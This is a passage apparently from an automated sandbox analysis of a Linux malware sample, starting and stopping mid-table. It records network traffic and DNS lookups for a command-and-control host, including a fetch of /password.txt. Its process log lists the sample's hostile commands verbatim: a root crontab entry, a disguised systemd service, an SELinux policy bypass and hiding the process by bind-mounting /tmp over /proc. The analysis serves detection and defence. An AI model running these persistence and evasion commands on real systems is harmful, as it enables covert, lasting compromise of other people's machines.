                                                            Nov 25, 2024 23:48:51.884670973 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:52.138009071 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:52.258138895 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:54.102051020 CET48720808192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:54.222687006 CET80848720103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:54.222820997 CET48720808192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:48:56.889988899 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:48:56.890300035 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:49:01.904618979 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:49:01.904750109 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:49:02.141010046 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:49:02.261357069 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:49:06.908113003 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:49:06.908286095 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:49:11.909420967 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:49:11.909528017 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:49:12.143213987 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:49:12.263151884 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:49:16.926855087 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:49:16.927011013 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:49:21.939047098 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:49:21.939259052 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:49:22.146192074 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:49:22.266299963 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:49:26.954727888 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:49:26.954916954 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:49:31.965656996 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:49:31.965817928 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:49:41.986480951 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:49:41.986808062 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:49:46.999875069 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:49:46.999922037 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:49:52.008557081 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:49:52.008688927 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:49:57.023458004 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:49:57.023591995 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:50:02.047151089 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:50:02.047323942 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:50:07.038703918 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:50:07.038949966 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:50:12.041923046 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:50:12.042033911 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:50:17.049513102 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:50:17.049810886 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:50:22.053280115 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:50:22.053349972 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:50:27.062666893 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:50:27.062977076 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:50:32.070241928 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:50:32.070497036 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:50:37.075423002 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:50:37.075701952 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:50:42.083013058 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:50:42.083287954 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:50:47.098817110 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:50:47.098952055 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:50:52.106829882 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:50:52.106997013 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:50:57.109630108 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:50:57.109781027 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:51:02.112633944 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:51:02.112860918 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:51:07.130527973 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:51:07.130800009 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:51:12.131880045 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:51:12.131993055 CET3894452462192.168.2.13103.135.101.78
                                                            Nov 25, 2024 23:51:17.146325111 CET5246238944103.135.101.78192.168.2.13
                                                            Nov 25, 2024 23:51:17.146435022 CET3894452462192.168.2.13103.135.101.78
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2024 23:47:01.734062910 CET3796353192.168.2.131.1.1.1
                                                            Nov 25, 2024 23:47:01.875147104 CET53379631.1.1.1192.168.2.13
                                                            Nov 25, 2024 23:47:02.369128942 CET4524553192.168.2.131.1.1.1
                                                            Nov 25, 2024 23:47:02.508093119 CET53452451.1.1.1192.168.2.13
                                                            Nov 25, 2024 23:47:02.515559912 CET4602753192.168.2.131.1.1.1
                                                            Nov 25, 2024 23:47:02.517731905 CET4863953192.168.2.131.1.1.1
                                                            Nov 25, 2024 23:47:03.002482891 CET53460271.1.1.1192.168.2.13
                                                            Nov 25, 2024 23:47:03.002506018 CET53486391.1.1.1192.168.2.13
                                                            Nov 25, 2024 23:49:47.399475098 CET5531653192.168.2.131.1.1.1
                                                            Nov 25, 2024 23:49:47.399539948 CET6056753192.168.2.131.1.1.1
                                                            Nov 25, 2024 23:49:47.539489985 CET53553161.1.1.1192.168.2.13
                                                            Nov 25, 2024 23:49:47.539504051 CET53605671.1.1.1192.168.2.13
                                                            TimestampSource IPDest IPChecksumCodeType
                                                            Nov 25, 2024 23:47:24.225410938 CET192.168.2.1192.168.2.13828a(Port unreachable)Destination Unreachable
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 25, 2024 23:47:01.734062910 CET192.168.2.131.1.1.10x3a27Standard query (0)www.google.com28IN (0x0001)false
                                                            Nov 25, 2024 23:47:02.369128942 CET192.168.2.131.1.1.10xb4d0Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                            Nov 25, 2024 23:47:02.515559912 CET192.168.2.131.1.1.10x3c16Standard query (0)aras.liveya.org28IN (0x0001)false
                                                            Nov 25, 2024 23:47:02.517731905 CET192.168.2.131.1.1.10xa403Standard query (0)aras.liveya.orgA (IP address)IN (0x0001)false
                                                            Nov 25, 2024 23:49:47.399475098 CET192.168.2.131.1.1.10xe90bStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                            Nov 25, 2024 23:49:47.399539948 CET192.168.2.131.1.1.10x7d06Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 25, 2024 23:47:01.875147104 CET1.1.1.1192.168.2.130x3a27No error (0)www.google.com28IN (0x0001)false
                                                            Nov 25, 2024 23:47:02.508093119 CET1.1.1.1192.168.2.130xb4d0No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 23:47:03.002506018 CET1.1.1.1192.168.2.130xa403No error (0)aras.liveya.org103.135.101.78A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 23:49:47.539489985 CET1.1.1.1192.168.2.130xe90bNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 23:49:47.539489985 CET1.1.1.1192.168.2.130xe90bNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                                            • 103.135.101.78:808
                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            0192.168.2.1348720103.135.101.78808
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 23:47:22.468425035 CET123OUTGET /password.txt HTTP/1.1
                                                            Host: 103.135.101.78:808
                                                            User-Agent: Go-http-client/1.1
                                                            Accept-Encoding: gzip
                                                            Nov 25, 2024 23:47:24.033026934 CET213INHTTP/1.1 200 OK
                                                            Accept-Ranges: bytes
                                                            Content-Length: 16
                                                            Content-Type: text/plain; charset=utf-8
                                                            Last-Modified: Sat, 21 May 2022 20:57:32 GMT
                                                            Date: Mon, 25 Nov 2024 22:47:23 GMT
                                                            Data Raw: cb 5e cf 60 9d e0 4a 51 15 21 27 9b bc c8 4c c8
                                                            Data Ascii: ^`JQ!'L


                                                            System Behavior

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/tmp/linux_386.elf
                                                            Arguments:/tmp/linux_386.elf
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/tmp/linux_386.elf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/bash
                                                            Arguments:/bin/bash -c /etc/32678&
                                                            File size:1183448 bytes
                                                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/bash
                                                            Arguments:-
                                                            File size:1183448 bytes
                                                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/32678
                                                            Arguments:/etc/32678
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/32678
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sleep
                                                            Arguments:sleep 60
                                                            File size:39256 bytes
                                                            MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/tmp/linux_386.elf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:service crond start
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/basename
                                                            Arguments:basename /usr/sbin/service
                                                            File size:39256 bytes
                                                            MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/basename
                                                            Arguments:basename /usr/sbin/service
                                                            File size:39256 bytes
                                                            MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl --quiet is-active multi-user.target
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:47:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl list-unit-files --full --type=socket
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:47:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sed
                                                            Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                            File size:121288 bytes
                                                            MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                            Start time (UTC):22:47:11
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl start crond.service
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/tmp/linux_386.elf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/tmp/linux_386.elf
                                                            Arguments:/tmp/linux_386.elf
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/tmp/linux_386.elf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:00
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/update-rc.d
                                                            Arguments:update-rc.d linux_kill defaults
                                                            File size:3478464 bytes
                                                            MD5 hash:16a21f464119ea7fad1d3660de963637

                                                            Start time (UTC):22:47:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/update-rc.d
                                                            Arguments:-
                                                            File size:3478464 bytes
                                                            MD5 hash:16a21f464119ea7fad1d3660de963637

                                                            Start time (UTC):22:47:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl daemon-reload
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:47:02
                                                            Start date (UTC):25/11/2024
                                                            Path:/tmp/linux_386.elf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:02
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/bash
                                                            Arguments:/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable linux.service;systemctl start linux.service;journalctl -xe --no-pager"
                                                            File size:1183448 bytes
                                                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                            Start time (UTC):22:47:02
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/bash
                                                            Arguments:-
                                                            File size:1183448 bytes
                                                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                            Start time (UTC):22:47:02
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl daemon-reload
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:47:03
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/bash
                                                            Arguments:-
                                                            File size:1183448 bytes
                                                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                            Start time (UTC):22:47:03
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl enable linux.service
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:47:05
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/bash
                                                            Arguments:-
                                                            File size:1183448 bytes
                                                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                            Start time (UTC):22:47:05
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl start linux.service
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:47:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/bash
                                                            Arguments:-
                                                            File size:1183448 bytes
                                                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                            Start time (UTC):22:47:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/journalctl
                                                            Arguments:journalctl -xe --no-pager
                                                            File size:80120 bytes
                                                            MD5 hash:bf3a987344f3bacafc44efd882abda8b

                                                            Start time (UTC):22:47:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/tmp/linux_386.elf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/bash
                                                            Arguments:/bin/bash -c "cd /boot;ausearch -c 'System.img.conf' --raw | audit2allow -M my-Systemimgconf;semodule -X 300 -i my-Systemimgconf.pp"
                                                            File size:1183448 bytes
                                                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                            Start time (UTC):22:47:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/bash
                                                            Arguments:-
                                                            File size:1183448 bytes
                                                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                            Start time (UTC):22:47:19
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/bash
                                                            Arguments:-
                                                            File size:1183448 bytes
                                                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                            Start time (UTC):22:47:20
                                                            Start date (UTC):25/11/2024
                                                            Path:/bin/bash
                                                            Arguments:-
                                                            File size:1183448 bytes
                                                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                            Start time (UTC):22:47:20
                                                            Start date (UTC):25/11/2024
                                                            Path:/tmp/linux_386.elf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:20
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/bash
                                                            Arguments:bash -c "echo \"*/1 * * * * root /.img \" >> /etc/crontab"
                                                            File size:1183448 bytes
                                                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                            Start time (UTC):22:47:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/tmp/linux_386.elf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/renice
                                                            Arguments:renice -20 5436
                                                            File size:14568 bytes
                                                            MD5 hash:3686c936ed1df483498266a36871cb5b

                                                            Start time (UTC):22:47:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/tmp/linux_386.elf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:21
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/mount
                                                            Arguments:mount -o bind /tmp/ /proc/5436
                                                            File size:55528 bytes
                                                            MD5 hash:92b20aa8b155ecd3ba9414aa477ef565

                                                            Start time (UTC):22:47:22
                                                            Start date (UTC):25/11/2024
                                                            Path:/tmp/linux_386.elf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:22
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:service cron start
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:22
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:22
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/basename
                                                            Arguments:basename /usr/sbin/service
                                                            File size:39256 bytes
                                                            MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                            Start time (UTC):22:47:23
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:23
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/basename
                                                            Arguments:basename /usr/sbin/service
                                                            File size:39256 bytes
                                                            MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                            Start time (UTC):22:47:23
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:23
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl --quiet is-active multi-user.target
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:47:23
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:23
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:23
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl list-unit-files --full --type=socket
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:47:23
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/sbin/service
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:23
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sed
                                                            Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                            File size:121288 bytes
                                                            MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                            Start time (UTC):22:47:25
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl start cron.service
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:47:26
                                                            Start date (UTC):25/11/2024
                                                            Path:/tmp/linux_386.elf
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:26
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/systemctl
                                                            Arguments:systemctl start crond.service
                                                            File size:996584 bytes
                                                            MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                            Start time (UTC):22:47:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/lib/systemd/systemd
                                                            Arguments:-
                                                            File size:1620224 bytes
                                                            MD5 hash:9b2bec7092a40488108543f9334aab75

                                                            Start time (UTC):22:47:01
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                            Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                            File size:22760 bytes
                                                            MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                            Start time (UTC):22:47:03
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/lib/systemd/systemd
                                                            Arguments:-
                                                            File size:1620224 bytes
                                                            MD5 hash:9b2bec7092a40488108543f9334aab75

                                                            Start time (UTC):22:47:03
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                            Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                            File size:22760 bytes
                                                            MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                            Start time (UTC):22:47:05
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/lib/systemd/systemd
                                                            Arguments:-
                                                            File size:1620224 bytes
                                                            MD5 hash:9b2bec7092a40488108543f9334aab75

                                                            Start time (UTC):22:47:05
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                            Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                            File size:22760 bytes
                                                            MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                            Start time (UTC):22:47:06
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/lib/systemd/systemd
                                                            Arguments:-
                                                            File size:1620224 bytes
                                                            MD5 hash:9b2bec7092a40488108543f9334aab75

                                                            Start time (UTC):22:47:06
                                                            Start date (UTC):25/11/2024
                                                            Path:/boot/System.img.config
                                                            Arguments:/boot/System.img.config
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:06
                                                            Start date (UTC):25/11/2024
                                                            Path:/boot/System.img.config
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:06
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/pkill
                                                            Arguments:pkill -9 32678
                                                            File size:30968 bytes
                                                            MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                            Start time (UTC):22:47:15
                                                            Start date (UTC):25/11/2024
                                                            Path:/boot/System.img.config
                                                            Arguments:-
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:47:15
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sh
                                                            Arguments:sh -c /etc/32678&
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sh
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/32678
                                                            Arguments:/etc/32678
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/32678
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:47:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/usr/bin/sleep
                                                            Arguments:sleep 60
                                                            File size:39256 bytes
                                                            MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                            Start time (UTC):22:48:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/32678
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):22:48:16
                                                            Start date (UTC):25/11/2024
                                                            Path:/etc/id.services.conf
                                                            Arguments:/etc/id.services.conf
                                                            File size:5251072 bytes
                                                            MD5 hash:f5c59e70b89c03eb69f02a7be662ed59

                                                            Start time (UTC):22:48:16
